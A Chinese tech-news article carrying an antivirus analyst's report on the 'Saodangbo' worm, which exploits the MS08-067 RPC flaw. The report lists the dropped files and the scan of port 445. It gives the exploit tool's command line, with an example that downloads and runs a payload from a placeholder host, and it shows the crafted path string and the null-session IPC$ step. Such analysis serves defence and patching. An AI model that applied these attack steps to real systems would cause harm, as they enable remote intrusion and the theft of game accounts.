"掃蕩波"蠕蟲氾濫　未打補丁的系統遭殃

【賽迪網-IT技術報道】在我的印象中，每一個傳播嚴重的蠕蟲都和一個系統漏洞有關：SQL Server蠕蟲王，數小時傳遍全球；衝擊波、震盪波讓普通網民認知到蠕蟲的威力。而這個MS08-067漏洞，在補丁發佈數周之後，還沒有發現蠕蟲氾濫，也可能是眾多可替代微軟update補丁的修復方案越來越普及的原因。

事實上，在這個漏洞發佈之後不久，在製造木馬盜號的圈子裡，各種不同版本的掃瞄器、批量抓雞工具在迅速氾濫。因此證明，沒有完美的漏洞修復方案，互聯網上總是很容易就找到大量不打補丁的計算機。

上週末，把木馬下載器、漏洞掃瞄工具、蠕蟲集成在一起的病毒終於氾濫。在這之前，一直有不少網民報告系統崩潰不能上網的現象，但一直沒有捕獲病毒樣本。原來這一類病毒入侵後，會嘗試刪除自身，抓到的樣本只是木馬下載器，而蠕蟲在得手後就自殺了，這在某種程度上也削弱了蠕蟲的傳播範圍。

以下是毒霸分析員對Worm.SaodangBo.a.94208的技術分析

MS08-067遠程下載者（掃蕩波）分析報告

1. 釋放病毒體

病毒運行後釋放以下文件：

aaa.batmrosconfig.exevista.exeqqq.sys

2. 掃瞄網內計算機

首先調用vista.exe對本網段(C類)範圍內的所有計算機的445端口進行掃瞄。之後，挑選出可以連上445端口的計算機保存到一個列表文件中。

3. 攻擊在線的計算機（有漏洞的會出現現象或中毒）

然後，病毒調用mrosconfig.exe對列表文件中的計算機發送RPC請求，使遠程計算機中的svchost.exe中解析RPC路徑時溢出，在遠程計算機中下載並執行http://xxx.xxx.com/down/ko.exe。

mrosconfig.exe是一個實現下載者功能的遠程溢出利用工具, 對應的命令行為：

mrosconfig.exe 要攻擊的計算機的IP 要在遠程下載的病毒的url

如：

mrosconfig.exe 127.0.0.1 http://xxx.xxx.com/down/ko.exe

具體的步驟如下：

(1)使用空用戶、空密碼連接上遠程計算機上的IPC$共享。

(2)向連上的計算機發送遠程路徑".//a/../../NN"。如果遠程計算機上未修復MS08-067漏洞，那麼svchost.exe調用NetpwPathCanonicalize函數解析此路徑時會溢出，從而執行遠程路徑後的指令。

(3)溢出指令下載附在指令後的url對應的文件到遠程計算機上，並運行此文件。

(4)下載的文件是一個木馬下載者，該下載者還會下載其他木馬程序安裝到被攻擊計算機上。已知會下載的木馬程序包括：機器狗木馬下載器，QQ三國、完美系列網游等遊戲盜號器。

如果攻擊失敗，則遠程計算機會出現「SVCHOST.exe」出錯提示，只有這個現象是用戶可見的。

如果用戶反映這個問題，則可以認為其所在的局域網內有機器中毒，但自身沒有中，打上補丁就可以避免。

4. 自刪除病毒體

刪除釋放的：mrosconfig.exe、vista.exe、qqq.sys、aaa.bat病毒文件。

(